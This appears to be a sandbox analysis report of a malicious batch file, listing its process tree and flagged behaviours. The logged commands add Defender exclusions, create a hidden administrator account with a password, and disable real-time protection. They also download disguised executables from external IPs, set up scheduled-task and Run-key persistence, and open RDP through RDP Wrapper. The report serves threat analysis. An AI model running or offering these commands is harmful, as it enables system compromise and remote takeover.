pid Process 1352 powershell.exe 1352 powershell.exe 1288 powershell.exe 1288 powershell.exe 3960 powershell.exe 3960 powershell.exe 2556 powershell.exe 2556 powershell.exe 3024 powershell.exe 3024 powershell.exe 556 powershell.exe 556 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4448 powershell.exe 4448 powershell.exe 2152 powershell.exe 2152 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 5112 powershell.exe 5112 powershell.exe 3968 powershell.exe 3968 powershell.exe 4572 powershell.exe 4572 powershell.exe 1868 svchost.exe 1868 svchost.exe 1868 svchost.exe 1868 svchost.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1244 powershell.exe 1244 powershell.exe 3648 svchost.exe 3648 svchost.exe 3648 svchost.exe 3648 svchost.exe 2020 svchost.exe 2020 svchost.exe 2020 svchost.exe 2020 svchost.exe 1780 svchost.exe 1780 svchost.exe 1780 svchost.exe 1780 svchost.exe 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe 1292 svchost.exe 1292 svchost.exe 1292 svchost.exe 1292 svchost.exe 5072 svchost.exe 5072 svchost.exe -
Suspicious behavior: LoadsDriver 9 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4384 wmic.exe Token: SeIncreaseQuotaPrivilege 4384 wmic.exe Token: SeSecurityPrivilege 4384 wmic.exe Token: SeTakeOwnershipPrivilege 4384 wmic.exe Token: SeLoadDriverPrivilege 4384 wmic.exe Token: SeSystemtimePrivilege 4384 wmic.exe Token: SeBackupPrivilege 4384 wmic.exe Token: SeRestorePrivilege 4384 wmic.exe Token: SeShutdownPrivilege 4384 wmic.exe Token: SeSystemEnvironmentPrivilege 4384 wmic.exe Token: SeUndockPrivilege 4384 wmic.exe Token: SeManageVolumePrivilege 4384 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4384 wmic.exe Token: SeIncreaseQuotaPrivilege 4384 wmic.exe Token: SeSecurityPrivilege 4384 wmic.exe Token: SeTakeOwnershipPrivilege 4384 wmic.exe Token: SeLoadDriverPrivilege 4384 wmic.exe Token: SeSystemtimePrivilege 4384 wmic.exe Token: SeBackupPrivilege 4384 wmic.exe Token: SeRestorePrivilege 4384 wmic.exe Token: SeShutdownPrivilege 4384 wmic.exe Token: SeSystemEnvironmentPrivilege 4384 wmic.exe Token: SeUndockPrivilege 4384 wmic.exe Token: SeManageVolumePrivilege 4384 wmic.exe Token: SeAssignPrimaryTokenPrivilege 1432 wmic.exe Token: SeIncreaseQuotaPrivilege 1432 wmic.exe Token: SeSecurityPrivilege 1432 wmic.exe Token: SeTakeOwnershipPrivilege 1432 wmic.exe Token: SeLoadDriverPrivilege 1432 wmic.exe Token: SeSystemtimePrivilege 1432 wmic.exe Token: SeBackupPrivilege 1432 wmic.exe Token: SeRestorePrivilege 1432 wmic.exe Token: SeShutdownPrivilege 1432 wmic.exe Token: SeSystemEnvironmentPrivilege 1432 wmic.exe Token: SeUndockPrivilege 1432 wmic.exe Token: SeManageVolumePrivilege 1432 wmic.exe Token: SeAssignPrimaryTokenPrivilege 1432 wmic.exe Token: SeIncreaseQuotaPrivilege 1432 wmic.exe Token: SeSecurityPrivilege 1432 wmic.exe Token: SeTakeOwnershipPrivilege 1432 wmic.exe Token: SeLoadDriverPrivilege 1432 wmic.exe Token: SeSystemtimePrivilege 1432 wmic.exe Token: SeBackupPrivilege 1432 wmic.exe Token: SeRestorePrivilege 1432 wmic.exe Token: SeShutdownPrivilege 1432 wmic.exe Token: SeSystemEnvironmentPrivilege 1432 wmic.exe Token: SeUndockPrivilege 1432 wmic.exe Token: SeManageVolumePrivilege 1432 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4772 wmic.exe Token: SeIncreaseQuotaPrivilege 4772 wmic.exe Token: SeSecurityPrivilege 4772 wmic.exe Token: SeTakeOwnershipPrivilege 4772 wmic.exe Token: SeLoadDriverPrivilege 4772 wmic.exe Token: SeSystemtimePrivilege 4772 wmic.exe Token: SeBackupPrivilege 4772 wmic.exe Token: SeRestorePrivilege 4772 wmic.exe Token: SeShutdownPrivilege 4772 wmic.exe Token: SeSystemEnvironmentPrivilege 4772 wmic.exe Token: SeUndockPrivilege 4772 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4908 wrote to memory of 1352 4908 cmd.exe 85 PID 4908 wrote to memory of 1352 4908 cmd.exe 85 PID 4908 wrote to memory of 4100 4908 cmd.exe 86 PID 4908 wrote to memory of 4100 4908 cmd.exe 86 PID 4100 wrote to memory of 4904 4100 cmd.exe 87 PID 4100 wrote to memory of 4904 4100 cmd.exe 87 PID 4908 wrote to memory of 4424 4908 cmd.exe 96 PID 4908 wrote to memory of 4424 4908 cmd.exe 96 PID 4908 wrote to memory of 4424 4908 cmd.exe 96 PID 4908 wrote to memory of 1288 4908 cmd.exe 105 PID 4908 wrote to memory of 1288 4908 cmd.exe 105 PID 4908 wrote to memory of 3960 4908 cmd.exe 106 PID 4908 wrote to memory of 3960 4908 cmd.exe 106 PID 4908 wrote to memory of 2556 4908 cmd.exe 107 PID 4908 wrote to memory of 2556 4908 cmd.exe 107 PID 4908 wrote to memory of 3024 4908 cmd.exe 108 PID 4908 wrote to memory of 3024 4908 cmd.exe 108 PID 4908 wrote to memory of 3588 4908 cmd.exe 109 PID 4908 wrote to memory of 3588 4908 cmd.exe 109 PID 3588 wrote to memory of 3956 3588 net.exe 110 PID 3588 wrote to memory of 3956 3588 net.exe 110 PID 4908 wrote to memory of 3516 4908 cmd.exe 111 PID 4908 wrote to memory of 3516 4908 cmd.exe 111 PID 3516 wrote to memory of 640 3516 net.exe 112 PID 3516 wrote to memory of 640 3516 net.exe 112 PID 4908 wrote to memory of 3064 4908 cmd.exe 113 PID 4908 wrote to memory of 3064 4908 cmd.exe 113 PID 3064 wrote to memory of 904 3064 net.exe 114 PID 3064 wrote to memory of 904 3064 net.exe 114 PID 4908 wrote to memory of 4068 4908 cmd.exe 115 PID 4908 wrote to memory of 4068 4908 cmd.exe 115 PID 4908 wrote to memory of 912 4908 cmd.exe 116 PID 4908 wrote to memory of 912 4908 cmd.exe 116 PID 912 wrote to memory of 852 912 net.exe 117 PID 912 wrote to memory of 852 912 net.exe 117 PID 4908 wrote to memory of 1688 4908 cmd.exe 118 PID 4908 wrote to memory of 1688 4908 cmd.exe 118 PID 1688 wrote to memory of 4920 1688 net.exe 119 PID 1688 wrote to memory of 4920 1688 net.exe 119 PID 2696 wrote to memory of 4384 2696 MeshAgent.exe 120 PID 2696 wrote to memory of 4384 2696 MeshAgent.exe 120 PID 2696 wrote to memory of 4384 2696 MeshAgent.exe 120 PID 4908 wrote to memory of 3580 4908 cmd.exe 122 PID 4908 wrote to memory of 3580 4908 cmd.exe 122 PID 2696 wrote to memory of 1432 2696 MeshAgent.exe 123 PID 2696 wrote to memory of 1432 2696 MeshAgent.exe 123 PID 2696 wrote to memory of 1432 2696 MeshAgent.exe 123 PID 4908 wrote to memory of 4512 4908 cmd.exe 125 PID 4908 wrote to memory of 4512 4908 cmd.exe 125 PID 4908 wrote to memory of 1200 4908 cmd.exe 126 PID 4908 wrote to memory of 1200 4908 cmd.exe 126 PID 2696 wrote to memory of 4772 2696 MeshAgent.exe 127 PID 2696 wrote to memory of 4772 2696 MeshAgent.exe 127 PID 2696 wrote to memory of 4772 2696 MeshAgent.exe 127 PID 4908 wrote to memory of 2460 4908 cmd.exe 128 PID 4908 wrote to memory of 2460 4908 cmd.exe 128 PID 4908 wrote to memory of 4988 4908 cmd.exe 130 PID 4908 wrote to memory of 4988 4908 cmd.exe 130 PID 4908 wrote to memory of 4424 4908 cmd.exe 131 PID 4908 wrote to memory of 4424 4908 cmd.exe 131 PID 4908 wrote to memory of 1456 4908 cmd.exe 132 PID 4908 wrote to memory of 1456 4908 cmd.exe 132 PID 4908 wrote to memory of 768 4908 cmd.exe 133 PID 4908 wrote to memory of 768 4908 cmd.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4076 attrib.exe 2504 attrib.exe 3528 attrib.exe 2156 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\system32\cmd.execmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"2⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\net.exenet use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"3⤵PID:4904
-
-
-
\??\UNC\45.139.196.250\shear\s.exe\\45.139.196.250\shear\s.exe -fullinstall2⤵
- Sets service image path in registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'c:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\system32\net.exenet user t1 Raed12346@@ /add2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 Raed12346@@ /add3⤵PID:3956
-
-
-
C:\Windows\system32\net.exenet localgroup administrators t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators t1 /add3⤵PID:640
-
-
-
C:\Windows\system32\net.exenet localgroup Administratörer t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administratörer t1 /add3⤵PID:904
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f2⤵
- Hide Artifacts: Hidden Users
PID:4068
-
-
C:\Windows\system32\net.exenet user t1 /active:no2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:no3⤵PID:852
-
-
-
C:\Windows\system32\net.exenet user t1 /active:yes2⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:yes3⤵PID:4920
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:3580
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f2⤵PID:4512
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f2⤵PID:1200
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f2⤵PID:2460
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:4988
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:4424
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f2⤵PID:1456
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:768
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f2⤵PID:3720
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f2⤵PID:1420
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "ngrok.zip" -DestinationPath "."2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4076
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata\*.*2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2504
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3528
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:2556
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:2340
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"2⤵
- Adds Run key to start application
PID:3872
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"2⤵
- Adds Run key to start application
PID:3564
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2156
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\installer.bat2⤵
- Drops file in Program Files directory
PID:2268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\hrdp\install.bat3⤵PID:556
-
C:\ProgramData\Windata\hrdp\RDPWInst.exe"C:\ProgramData\Windata\hrdp\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5040 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4828
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "update.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "autoupdate.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1244
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"3⤵
- Drops file in Program Files directory
PID:4376 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:3904
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2552
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4856
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:5112
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1488
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:556
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4444
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3360
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:812
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1908
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\re-install.bat"3⤵
- Drops file in Program Files directory
PID:4552 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:4472
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
PID:4992 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2696
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4928 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3252
-
-
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:5008
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2720
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:812
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4648
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3516
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2448
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1800
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:964
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1900
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3988
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"3⤵PID:3328
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:4440
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:104⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4800
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"3⤵
- Drops file in Program Files directory
PID:2460 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:632
-
-
C:\Windows\system32\sc.exesc queryex "TermService"4⤵
- Launches sc.exe
PID:4076
-
-
C:\Windows\system32\find.exefind "STATE"4⤵PID:4068
-
-
C:\Windows\system32\find.exefind /v "RUNNING"4⤵PID:4528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp4⤵PID:1696
-
C:\Windows\system32\query.exequery session rdp-tcp5⤵PID:2504
-
C:\Windows\system32\qwinsta.exe"C:\Windows\system32\qwinsta.exe" rdp-tcp6⤵PID:1320
-
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"4⤵
- Server Software Component: Terminal Services DLL
PID:2468
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4928 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2452
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4272
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:4108
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:1944
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"4⤵PID:1668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"4⤵PID:3156
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"5⤵PID:1736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul4⤵PID:5016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"5⤵PID:3036
-
-
-
